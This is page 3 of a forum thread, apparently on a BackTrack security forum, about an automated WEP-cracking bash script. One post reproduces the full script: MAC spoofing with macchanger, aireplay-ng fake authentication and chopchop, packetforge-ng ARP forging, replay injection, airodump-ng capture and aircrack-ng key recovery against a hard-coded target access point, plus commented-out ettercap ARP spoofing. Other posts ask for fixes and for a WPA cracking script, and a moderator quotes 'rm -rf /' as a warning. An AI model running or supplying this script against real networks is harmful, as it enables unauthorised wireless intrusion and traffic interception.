Page 3 of 4 FirstFirst 1234 LastLast
Results 21 to 30 of 33

Thread: WEP crack Script AUTOHACK.sh

  1. #21
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Also did you pay any attention to where this guide has been posted to?

    Maybe you should be not just type what someone wrote and think a bit about it.

    Or would you just do a
    rm -rf /
    if someone would tell you that it'd fix the issue?
    Tiocfaidh ár lá

  2. #22
    Just burned his ISO
    Join Date
    May 2009
    Posts
    23

    Default

    i had replaced wlan0 -> wifi0 then i got error

    ERROR: Can't change MAC: interface up or not permission: Device or resource busy
    I couldn't change mac address, can you help me change it

  3. #23
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    No we can not help you change it. Go and learn the basics if you can't understand the errormessage. It clearly states what's wrong.

    Use some common sense and you will find your solution
    Tiocfaidh ár lá

  4. #24
    Just burned his ISO
    Join Date
    May 2009
    Posts
    23

    Default

    aireplay-ng -4 -h $varmymac -b $varapmac ath0
    For information, no action required: Using gettimeofday() instead of /dev/rtc
    What is the problem

    #!/bin/bash
    macchanger -m 00:11:22:33:44:55 wifi0

    varmymac="00:11:22:33:44:55"



    # TARGET INFO
    varapmac="00:02:CF:54:CF:80"
    varchannel="6"


    echo NOTES:
    echo good power is 50+



    rm -Rf out* repla* *.cap *.xor arp

    airmon-ng start wifi0 $varchannel

    aireplay-ng -1 0 -a $varapmac -h $varmymac ath0

    #screen wait for Y
    aireplay-ng -4 -h $varmymac -b $varapmac ath0

    mv *.xor 1.xor
    packetforge-ng -0 -a $varapmac -h $varmymac -k 255.255.255.255 -l 255.255.255.255 -w arp -y 1.xor

    #screen

    echo !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    echo ! PRESS Y ENTER WHEN THE PROMPT POPS UP !
    echo !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    sleep 5

    xterm -e "airodump-ng -c $varchannel --bssid $varapmac -w arps ath0" &




    xterm -e "aireplay-ng -2 -r arp ath0" &



    echo RUN !!!!!!
    echo aircrack-ng -P 2 -b $varapmac '*.cap'
    #aircrack-ng -P 2 -b $varapmac arp*.cap


    # ettercap -i wlan0 -T -q -M ARP // //


    # wesside-ng -i wlan0 -v AP
    In the first, i had finished, but in the second, i didn't finish again Why so ?

  5. #25
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Because you are reading and using a script made for BT2 with BT4 while there has been major changes in the base
    Tiocfaidh ár lá

  6. #26
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    learn to google error messages :

    http://lmgtfy.com/?q=ERROR%3A+Can%27...resource+busy+

    iface is up cant change mac

  7. #27
    Just burned his ISO
    Join Date
    May 2009
    Posts
    23

    Default

    Did you have auto script for WPA cracking ?

  8. #28
    Just burned his ISO Static's Avatar
    Join Date
    May 2009
    Posts
    17

    Default

    BT4
    ... echo good power is 50+


    OLD for BT3
    ... echo good power is 40+
    Why in hell good power is different from BT3 to BT4??
    Which PWR is good anyway? How did you came to this conclusion?

  9. #29
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    installed BT$ prefilna with wepbuster tested OK

    lol well the disclaimer is that it is a lame script so :P

  10. #30
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default

    i get this error when running on BT3. Is this script fixed ?


    sorry double post..

Page 3 of 4 FirstFirst 1234 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •